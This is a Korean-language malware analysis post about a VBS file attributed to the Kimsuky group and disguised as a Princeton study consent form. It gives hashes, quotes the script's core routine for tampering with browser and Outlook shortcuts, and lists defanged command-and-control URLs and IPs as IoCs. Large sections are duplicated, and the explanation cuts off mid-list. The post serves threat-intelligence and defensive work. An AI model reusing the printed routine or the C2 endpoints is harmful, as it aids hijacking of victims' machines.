김수키(Kimsuky) 에서 만든 악성코드-Consent Form_Princeton Study.vbs(2023.8.14)
Contents
오늘은 북한 해킹 조직인 김수키(Kimsuky) 에서 만든 악성코드인 Consent Form_Princeton Study.vbs(2023.8.14)에 대해 글을 적어 보겠습니다.
먼저 해당 악성코드의 해쉬값은 다음과 같습니다.
파일명: Consent Form_Princeton Study.vbs
사이즈:34.2 KB
CRC32:249e824b
MD5:ca8728ce8f77cfc804f9ce343de9c9ee
SHA-1:1af5d54ed7dc4e872684461a75f0cc20edc02231
SHA-256:470027cf8dd33b201b465b109a9876d0a75667be907af770eb76ff5798496ae4
일단 해당 악성코드는 vbs 로 만들어진 악성코드입니다.
유포되는 이름은 다음과 같습니다.
470027cf8dd33b201b465b109a9876d0a75667be907af770eb76ff5798496ae4.vbs
Consent Form_Princeton Study.vbs
일단 해당 악성코드의 핵심 코드는 다음과 같습니다.
Sub wsxrfv0(strFolderPath) On Error Resume Next Set objFSO = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") Set objFolder = objFSO.GetFolder(strFolderPath) For Each objFile In objFolder.Files filespec=strFolderPath+"\"(+)objFile.Name If LCase(Right(objFile.Name,4))=".lnk" Then Set lnk = ws.CreateShortcut(filespec) path=lnk.TargetPath icon=LCase(lnk.IconLocation) If Right(icon,4)="(.)exe" Then icon=icon+"(,)0" End If icon1=Left(icon,InStr(icon,",")-1) If path="" And Right(icon1,4)="(.)exe" Then path=icon1 End If If Left(icon,1)="," Then icon=path+icon End If file=LCase(Right(path,Len(path)-InStrRev(path,"\"))) If file="msedge.exe" Or file="chrome.exe" Or file="outlook.exe" Or file="whale.exe" Or file="firefox.exe" Then tmp=objFile.Name objFSO.CopyFile filespec, ws.SpecialFolders("appdata")+"\1"+tmp,True objFSO.DeleteFile filespec objFSO.CopyFile ws.SpecialFolders("appdata")(+)"\1"(+)tmp, ws.SpecialFolders("Desktop")+"\"(+)tmp,True End If End If Next End Sub
해당 스크립트는 주어진 폴더 내에 있는 바로 가기 파일(.lnk)을 분석하고 특정 프로그램들의 실행 바로 가기를 찾아 바탕화면으로 복사하는 역할을 합니다.
1.Sub wsxrfv0(strFolderPath):스크립트의 메인 서브루틴을 정의하고 폴더 경로를 매개변수로 받습니다.
2.On Error …
먼저 해당 악성코드의 해쉬값은 다음과 같습니다.
파일명: Consent Form_Princeton Study.vbs
사이즈:34.2 KB
CRC32:249e824b
MD5:ca8728ce8f77cfc804f9ce343de9c9ee
SHA-1:1af5d54ed7dc4e872684461a75f0cc20edc02231
SHA-256:470027cf8dd33b201b465b109a9876d0a75667be907af770eb76ff5798496ae4
일단 해당 악성코드는 vbs 로 만들어진 악성코드입니다.
유포되는 이름은 다음과 같습니다.
470027cf8dd33b201b465b109a9876d0a75667be907af770eb76ff5798496ae4.vbs
Consent Form_Princeton Study.vbs
일단 해당 악성코드의 핵심 코드는 다음과 같습니다.
Sub wsxrfv0(strFolderPath) On Error Resume Next Set objFSO = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") Set objFolder = objFSO.GetFolder(strFolderPath) For Each objFile In objFolder.Files filespec=strFolderPath+"\"(+)objFile.Name If LCase(Right(objFile.Name,4))=".lnk" Then Set lnk = ws.CreateShortcut(filespec) path=lnk.TargetPath icon=LCase(lnk.IconLocation) If Right(icon,4)="(.)exe" Then icon=icon+"(,)0" End If icon1=Left(icon,InStr(icon,",")-1) If path="" And Right(icon1,4)="(.)exe" Then path=icon1 End If If Left(icon,1)="," Then icon=path+icon End If file=LCase(Right(path,Len(path)-InStrRev(path,"\"))) If file="msedge.exe" Or file="chrome.exe" Or file="outlook.exe" Or file="whale.exe" Or file="firefox.exe" Then tmp=objFile.Name objFSO.CopyFile filespec, ws.SpecialFolders("appdata")+"\1"+tmp,True objFSO.DeleteFile filespec objFSO.CopyFile ws.SpecialFolders("appdata")(+)"\1"(+)tmp, ws.SpecialFolders("Desktop")+"\"(+)tmp,True End If End If Next End Sub
해당 스크립트는 주어진 폴더 내에 있는 바로 가기 파일(.lnk)을 분석하고 특정 프로그램들의 실행 바로 가기를 찾아 바탕화면으로 복사하는 역할을 합니다.
1.Sub wsxrfv0(strFolderPath):스크립트의 메인 서브루틴을 정의하고 폴더 경로를 매개변수로 받습니다.
2.On Error …
IoC
104.18.14.101
104.18.15.101
108.177.119.102
108.177.119.95
108.177.126.132
108.177.126.139
108.177.126.94
108.177.126.95
108.177.127.84
108.177.127.95
108.177.96.138
142.251.31.138
173.194.69.94
173.194.79.94
173.194.79.95
192.178.27.195
192.178.49.195
1af5d54ed7dc4e872684461a75f0cc20edc02231
34.104.35.123
34.87.124.238
470027cf8dd33b201b465b109a9876d0a75667be907af770eb76ff5798496ae4
63.250.38.85
74.125.143.94
ca8728ce8f77cfc804f9ce343de9c9ee
https://grekop.online/brad/ca.php?na=reg(.)gif
https://grekop.online/brad/re(.)php
https://grekop.online/brad/share.docx
104.18.15.101
108.177.119.102
108.177.119.95
108.177.126.132
108.177.126.139
108.177.126.94
108.177.126.95
108.177.127.84
108.177.127.95
108.177.96.138
142.251.31.138
173.194.69.94
173.194.79.94
173.194.79.95
192.178.27.195
192.178.49.195
1af5d54ed7dc4e872684461a75f0cc20edc02231
34.104.35.123
34.87.124.238
470027cf8dd33b201b465b109a9876d0a75667be907af770eb76ff5798496ae4
63.250.38.85
74.125.143.94
ca8728ce8f77cfc804f9ce343de9c9ee
https://grekop.online/brad/ca.php?na=reg(.)gif
https://grekop.online/brad/re(.)php
https://grekop.online/brad/share.docx